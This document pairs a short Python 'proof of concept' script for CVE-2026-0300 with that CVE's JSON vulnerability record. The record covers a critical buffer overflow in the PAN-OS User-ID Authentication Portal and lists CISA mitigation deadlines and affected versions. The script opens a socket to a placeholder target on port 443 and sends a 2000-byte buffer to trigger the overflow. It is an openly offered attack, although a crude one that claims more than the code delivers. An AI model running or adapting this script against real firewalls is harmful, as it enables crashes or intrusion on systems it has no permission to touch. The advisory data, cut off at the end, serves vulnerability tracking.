CVE-2026-0300

import socket # Proof of Concept for CVE-2026-0300 # This script sends a crafted packet to trigger the buffer overflow. # Note: Adjust payload size and target port based on specific environment analysis. def send_exploit(target_ip, target_port): payload = b"A" * 2000 # Malicious buffer to cause overflow try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) s.send(payload) print("[+] Payload sent to target.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_ip = "192.168.1.1" # Replace with target IP target_port = 443 # Replace with actual service port send_exploit(target_ip, target_port)

{"cve": {"id": "CVE-2026-0300", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:35.730", "lastModified": "2026-05-12T18:47:21.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. \n\nThe risk of this issue is greatly reduced if you secure access to the User-ID™ Authentication Portal per the best practice guidelines https://knowledgebase.paloaltonetworks.com/KCSArticleDetail by restricting access to only trusted internal IP addresses.\n\nPrisma Access, Cloud NGFW and Panorama appliances are not impacted by this vulnerability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Red", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "ATTACKED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-05-06", "cisaActionDue": "2026-05-09", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Until the vendor releases an official fix, the following workaround should be implemented: - Restrict User-ID Authentication Portal access to only trusted zones. - Disable User-ID Authentication Portal if not required. 5/13/2026: Palo Alto has released a variety of patches. If these are relevant to your environment, please apply the designated patch.", "cisaVulnerabilityName": "Palo Alto Networks PAN-OS Out-of-bounds Write Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D515774C-BDB8-4A78-BCFB-01A825B93DF5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6B050597-FC74-4667-83A5-A82BCAD1FCE3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "2AACF8E4-ABED-4617-80D8-2ABC37AAC005"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "E6220162-85C0-4DC7-AE73-643A2BA08090"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "AEEE3F9F-2F8F-4F1D-9BC8-1EAF9673B68D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "909CCBED-27AC-4888-91B7-FDA621861AB6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.6:*:*:*:*:*:*:*", "matchCriteriaId": "39A74871-369E-4B91-A70A-801AF1A8B406"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:-:*:*:*:*:*:*", "ma ... (truncated)